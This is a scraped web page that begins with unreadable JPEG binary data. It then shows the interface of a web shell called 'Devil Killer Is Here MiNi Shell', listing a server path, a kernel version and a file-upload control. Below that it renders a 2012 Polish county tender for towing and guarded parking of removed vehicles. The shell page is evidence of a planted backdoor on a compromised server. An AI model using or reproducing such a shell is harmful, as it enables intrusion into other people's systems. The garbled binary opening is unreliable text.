JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120322/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120322/90270-N-2012.html

<p class="kh_header"><b>Ustrzyki Dolne: Usuwanie pojazdów oraz prowadzenie parkingu strzeżonego dla pojazdów usuniętych na podstawie art. 130 a ustawy Prawo o ruchu drogowym.</b><br>
<b>Numer ogłoszenia: 90270 - 2012; data zamieszczenia: 22.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Ustrzykach Dolnych , ul. Bełska 22, 38-700 Ustrzyki Dolne, woj. podkarpackie, tel. 013 4711080, faks 013 4711073.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bieszczadzki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usuwanie pojazdów oraz prowadzenie parkingu strzeżonego dla pojazdów usuniętych na podstawie art. 130 a ustawy Prawo o ruchu drogowym..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest wyłonienie Wykonawcy na usługi wykonywane na terenie powiatu  bieszczadzkiego w trybie określonym w art. 130a ust. 5f ustawy z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym, który zaczął obowiązywać od dnia 21 sierpnia 2011 r. zwaną dalej ustawą oraz wydanego na podstawie wyżej wymienionej ustawy rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 22 czerwca 2011r.                       w sprawie usuwania pojazdów, których używanie może zagrażać bezpieczeństwu lub porządkowi ruchu drogowego albo utrudniających prowadzenie akcji ratowniczej zwanego dalej rozporządzeniem polegające na:
1) usuwaniu pojazdów na wyznaczony parking strzeżony z dróg położonych na terenie powiatu bieszczadzkiego  w przypadkach, o których mowa w art. 130a ust.1 i 2 ustawy;
2) przechowywaniu pojazdów usuniętych z drogi w przypadkach, o których mowa w art. 130a
ust. 1 i 2 ustawy na parkingu strzeżonym wyznaczonym przez Starostę Bieszczadzkiego ;

3.1.	Przedmiot zamówienia obejmuje trzy odrębne zadania (części): 
1)	Zadanie Nr I: Usuwanie pojazdów oraz prowadzenie parkingu strzeżonego dla pojazdów o dopuszczalnej masie całkowitej do 3, 5 tony;
2)	Zadanie Nr II: Usuwanie pojazdów oraz prowadzenie parkingu strzeżonego dla pojazdów o dopuszczalnej masie całkowitej powyżej 3, 5 tony;
3)	Zadanie Nr III: Usuwanie pojazdów oraz prowadzenie parkingu strzeżonego dla pojazdów przewożących materiały niebezpieczne.
Opisy zadań:
1)	Zadanie Nr I: Usuwanie pojazdów oraz prowadzenie parkingu strzeżonego dla pojazdów o dopuszczalnej masie całkowitej do 3, 5 tony:
Rodzaj pojazdów wchodzących w zakres zadania: rowery, motorowery, motocykle, pojazdy o dopuszczalnej masie całkowitej do 3,5 t.
Przedmiotem zamówienia jest usługa świadczona całodobowo przez 7 dni                w tygodniu  polegająca na holowaniu i parkowaniu pojazdów usuniętych na podstawie art.130a ustawy Prawo o ruchu drogowym.
Zakres podstawowych czynności wchodzących w skład zlecenia usługi transportowej (bez względu na warunki atmosferyczne, porę dnia lub nocy oraz utrudnienia wynikające z ukształtowania terenu, warunków zabudowy inne) obejmuje:
a)	przyjęcie zlecenia przyjazdu pojazdu holującego;
b)	dojazd do wskazanego przez upoważnioną osobę wydającą dyspozycję usunięcia pojazdu  miejsca przebywania pojazdu w czasie do 60 minut;
c)	przygotowanie pojazdu lub pojazdu i jego elementów do załadunku (wszelkie prace towarzyszące przygotowaniu pojazdu do transportu);
d)	załadunek pojazdu (części pojazdu) na zestaw holujący;
e)	wyciąganie pojazdu spoza drogi o ile jest to konieczne w celu usunięcia pojazdu z miejsca zdarzenia;
f)	uporządkowanie miejsca zdarzenia z odpadków szkła, metalu i innych odpadków nie wymagających użycia specjalistycznego sprzętu i materiałów;
g)	dojazd z pojazdem transportowanym na wyznaczony parking strzeżony;
h)	rozładunek i parkowanie pojazdu na parkingu Wykonawcy;
i)	przechowywanie w zabezpieczonym pomieszczeniu wyposażenia pojazdu, części lub innych elementów zabezpieczonego pojazdu, które zostały oddzielone od pojazdu i mogłyby ulec zniszczeniu lub zaginięciu w miejscu do przechowywania pojazdów.
Do holowania pojazdów winien być wykorzystywany sprzęt specjalistyczny przeznaczony do tego rodzaju zadań typu laweta w liczbie zapewniającej możliwość sprawnego i ciągłego odholowania pojazdu z każdego miejsca na terenie Powiatu Brzozowskiego w możliwie najszybszym czasie.
Parkowanie pojazdów winno się odbywać na parkingu strzeżonym, odpowiednio ogrodzonym, oświetlonym, monitorowanym z całodobowym dozorem. 
a)	ogrodzenie parkingu trwałe - betonowe lub metalowe;
b)	nawierzchnia parkingu powinna być utwardzona; 
c)	pojazdy uszkodzone winy być zabezpieczone w sposób niezagrażający środowisku, a jednocześnie tak, by ich stan nie ulegał znacznemu pogorszeniu poprzez parkowanie;
d)	minimalna ilość miejsc parkingowych dla pojazdów do 3,5 t - 8 miejsc parkingowych;
e)	parking zamykany w sposób uniemożliwiający wjazd i wyjazd środka transportu bez zezwolenia osoby dozorującej.
Do przedmiotu zamówienia zaliczana jest usługa związana z odstępstwem od usunięcia pojazdu. Zakres czynności, które wchodzą w usługę:
a)	dojazd do miejsca zdarzenia - odstąpienie od wykonania usługi;
b)	dojazd do miejsca zdarzenia podjęcie czynności załadunku pojazdu - odstąpienie od usługi.

2) Zadanie Nr II:Usuwanie pojazdów oraz prowadzenie parkingu strzeżonego dla pojazdów o dopuszczalnej masie całkowitej przekraczającej 3, 5 tony:
Rodzaj pojazdów wchodzących w zakres zadania: pojazdy o dopuszczalnej masie całkowitej przekraczającej 3,5 t.
Przedmiotem zamówienia jest usługa świadczona całodobowo przez 7 dni w tygodniu  polegająca na holowaniu i parkowaniu pojazdów usuniętych na podstawie art.130a ustawy Prawo o ruchu drogowym.
Zakres podstawowych czynności wchodzących w skład zlecenia usługi transportowej (bez względu na warunki atmosferyczne, porę dnia lub nocy oraz utrudnienia wynikające z ukształtowania terenu, warunków zabudowy inne) obejmuje:
a)	przyjęcie zlecenia przyjazdu pojazdu holującego;
b)	dojazd do wskazanego przez upoważnioną osobę wydającą dyspozycję usunięcia pojazdu miejsca przebywania pojazdu w czasie do 60 minut;
c)	przygotowanie pojazdu lub pojazdu i jego elementów do załadunku (wszelkie prace towarzyszące przygotowaniu pojazdu do transportu);
d)	załadunek pojazdu (części pojazdu) na zestaw holujący;
e)	wyciąganie pojazdu spoza drogi o ile jest to konieczne w celu usunięcia pojazdu z miejsca zdarzenia;
f)	uporządkowanie miejsca zdarzenia z odpadków szkła, metalu i innych odpadków nie wymagających użycia specjalistycznego sprzętu i materiałów;
g)	dojazd z pojazdem transportowanym na wyznaczony parking strzeżony;
h)	rozładunek i parkowanie pojazdu na parkingu Wykonawcy;
i)	przechowywanie w zabezpieczonym pomieszczeniu wyposażenia pojazdu, części lub innych elementów zabezpieczonego pojazdu, które zostały oddzielone od pojazdu i mogłyby ulec zniszczeniu lub zaginięciu w miejscu do przechowywania pojazdów.
Do holowania pojazdów winien być wykorzystywany sprzęt specjalistyczny przeznaczony do tego rodzaju zadań typu laweta i holownik z wciągarką w liczbie zapewniającej możliwość sprawnego i ciągłego odholowania pojazdu z każdego miejsca na terenie Powiatu Brzozowskiego w możliwie najszybszym czasie.
Parkowanie pojazdów winno się odbywać na parkingu strzeżonym, odpowiednio ogrodzonym, oświetlonym, monitorowanym z całodobowym dozorem. 
a)	ogrodzenie parkingu trwałe - betonowe lub metalowe;
b)	nawierzchnia parkingu powinna być utwardzona; 
c)	pojazdy uszkodzone winy być zabezpieczone w sposób niezagrażający środowisku, a jednocześnie tak, by ich stan nie ulegał znacznemu pogorszeniu poprzez parkowanie;
d)	minimalna ilość miejsc parkingowych dla pojazdów powyżej 3,5 t - 4 miejsca parkingowe;
e)	parking zamykany w sposób uniemożliwiający wjazd i wyjazd środka transportu bez zezwolenia osoby dozorującej.
Do przedmiotu zamówienia zaliczana jest usługa związana z odstępstwem od usunięcia pojazdu. Zakres czynności, które wchodzą w usługę:
a)	dojazd do miejsca zdarzenia - odstąpienie od wykonania usługi;
b)	dojazd do miejsca zdarzenia podjęcie czynności załadunku pojazdu - odstąpienie od usługi.

3).Zadanie Nr III: Usuwanie pojazdów oraz prowadzenie parkingu strzeżonego dla pojazdów przewożących materiały niebezpieczne:
Rodzaj pojazdów wchodzących w zakres zadania: wszelkie pojazdy przewożące materiały niebezpieczne.
Przedmiotem zamówienia jest usługa świadczona całodobowo przez 7 dni w tygodniu  polegająca na holowaniu i parkowaniu pojazdów usuniętych na podstawie art.130a ustawy Prawo o ruchu drogowym.
Zakres podstawowych czynności wchodzących w skład zlecenia usługi transportowej (bez względu na warunki atmosferyczne, porę dnia lub nocy oraz utrudnienia wynikające z ukształtowania terenu, warunków zabudowy inne) obejmuje:
a)	przyjęcie zlecenia przyjazdu pojazdu holującego;
b)	dojazd do wskazanego przez upoważnioną osobę wydającą dyspozycję usunięcia pojazdu  miejsca przebywania pojazdu w czasie do 60 minut;
c)	przygotowanie pojazdu lub pojazdu i jego elementów do załadunku (wszelkie prace towarzyszące przygotowaniu pojazdu do transportu);
d)	załadunek pojazdu (części pojazdu) na zestaw holujący;
e)	wyciąganie pojazdu spoza drogi o ile jest to konieczne w celu usunięcia pojazdu z miejsca zdarzenia;
f)	uporządkowanie miejsca zdarzenia z odpadków szkła, metalu i innych odpadków nie wymagających użycia specjalistycznego sprzętu i materiałów;
g)	dojazd z pojazdem transportowanym na wyznaczony parking strzeżony;
h)	rozładunek i parkowanie pojazdu na parkingu Wykonawcy;
i)	przechowywanie w zabezpieczonym pomieszczeniu wyposażenia pojazdu, części lub innych elementów zabezpieczonego pojazdu, które zostały oddzielone od pojazdu i mogłyby ulec zniszczeniu lub zaginięciu w miejscu do przechowywania pojazdów.
Do holowania pojazdów winien być wykorzystywany sprzęt specjalistyczny przeznaczony do tego rodzaju zadań typu laweta, holownik i wciągarka w liczbie zapewniającej możliwość sprawnego i ciągłego odholowania pojazdu z każdego miejsca na terenie Powiatu Brzozowskiego w możliwie najszybszym czasie.
Parkowanie pojazdów winno się odbywać na parkingu strzeżonym, odpowiednio ogrodzonym, oświetlonym, monitorowanym z całodobowym dozorem. 
a)	ogrodzenie parkingu trwałe - betonowe lub metalowe;
b)	nawierzchnia parkingu powinna być utwardzona; 
c)	pojazdy uszkodzone winy być zabezpieczone w sposób niezagrażający środowisku, a jednocześnie tak, by ich stan nie ulegał znacznemu pogorszeniu poprzez parkowanie;
d)	minimalna ilość miejsc parkingowych dla pojazdów przewożących materiały niebezpieczne - 2 miejsca parkingowe;
e)	parking zamykany w sposób uniemożliwiający wjazd i wyjazd środka transportu bez zezwolenia osoby dozorującej.
Do przedmiotu zamówienia zaliczana jest usługa związana z odstępstwem od usunięcia pojazdu. Zakres czynności, które wchodzą w usługę:
a)	dojazd do miejsca zdarzenia - odstąpienie od wykonania usługi;
b)	dojazd do miejsca zdarzenia podjęcie czynności załadunku pojazdu odstąpienie od usługi
4. Dyspozycję usunięcia pojazdu z drogi wydają uprawnione organy, określone przepisami art.130a ust. 4 ustawy - Prawo o ruchu drogowym oraz rozporządzenia.
5. Treść art. 130a ustawy z 20 czerwca 1997 r. - Prawo o ruchu drogowym w brzmieniu
obowiązywania od 21 sierpnia 2011 r. oraz wydanego na jego podstawie rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 22 czerwca 2011 r. w sprawie usuwania pojazdów, których używanie może zagrażać bezpieczeństwu lub porządkowi ruchu drogowego albo utrudniających prowadzenie akcji ratowniczej zawiera Załącznik Nr 1 i 1a do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.11.80.00-5, 50.11.81.10-9, 98.35.11.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie wymaga wnoszenia wadium przez Wykonawców.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu przez Wykonawcę warunków udziału w postępowaniu, oraz poświadczoną za zgodność z oryginałem kserokopię licencji na wykonywanie krajowego transportu drogowego rzeczy wydaną na podstawie przepisów ustawy z dnia 6 września 2001 r.
Zamawiajacy oceni spełnienie opisanych wyzej warunków udziału w postepowaniu na podstawie przedstawionych przez Wykonawcę oświadczeń, o których mowa w pkt VIII 1 SIWZ metoda spełnia-= nie spełnia.
o transporcie drogowym.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i
doświadczenia, wykonanych lub wykonywanych w okresie ostatnich trzech lat przed dniem
wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest
krótszy - w tym okresie, w którym wykazane zostaną co najmniej dwa zamówienia dotyczące
usług w zakresie usuwania lub holowania pojazdów i dwa zamówienia dotyczące usług
parkowania pojazdów, z których każde było wykonywane przez okres nie krótszy niż 12 miesięcy
w ramach jednego zamówienia oraz dokumenty potwierdzające, że usługi przedstawione w
powyższym wykazie zostały wykonane należycie;
Zamawiajacy oceni spełnienie opisanych wyzej warunków udziału w postepowaniu na podstawie przedstawionych przez Wykonawcę oświadczeń, o których mowa w pkt VIII 1 SIWZ metoda spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz niezbędnych do wykonania zamówienia pojazdów i urządzeń, jakimi dysponuje Wykonawca,
Zamawiajacy oceni spełnienie opisanych wyzej warunków udziału w postepowaniu na podstawie przedstawionych przez Wykonawcę oświadczeń, o których mowa w pkt VIII 1 SIWZ metoda spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
- posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności (ubezpieczenie przewoźnika i ubezpieczenie parkingu) na łączną kwotę nie mniejszą niż 200 000,00 zł.
Zamawiajacy oceni spełnienie opisanych wyzej warunków udziału w postepowaniu na podstawie przedstawionych przez Wykonawcę oświadczeń, o których mowa w pkt VIII 1 SIWZ metoda spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) dokument lub kserokopia poświadczona za zgodność z oryginałem przez Wykonawcę potwierdzający prawo Wykonawcy do dysponowania nieruchomością, na której zlokalizowany jest (będzie) parking w tym pisemne zobowiązanie właściciela nieruchomości do oddania jej do dyspozycji Wykonawcy na okres korzystania z niej przy wykonywaniu zamówienia;
 2) mapa, szkic z lokalizacją parkingu oraz naniesionymi drogami dojazdowymi;
 3) nie mniej niż 3 fotografie o wymiarach 10 x 15 cm, na których widoczne będą:
plac parkingowy, budynek przeznaczony na garaż (budynki garażowe), ogrodzenie parkingu, oświetlenie parkingu; 
4) kserokopie dowodów rejestracyjnych pojazdów wykazanych w wykazie, 
5) dokumenty lub kserokopie poświadczone za zgodność z oryginałem przez Wykonawcę potwierdzające prawo Wykonawcy do dysponowania pojazdami wykazanymi w wykazie, jeśli prawo to nie wynika bezpośrednio z prawa własności pojazdów uwidocznionego w dowodach rejestracyjnych pojazdów w tym pisemne zobowiązanie właściciela pojazdu do oddania pojazdu do dyspozycji Wykonawcy na okres korzystania z niego przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
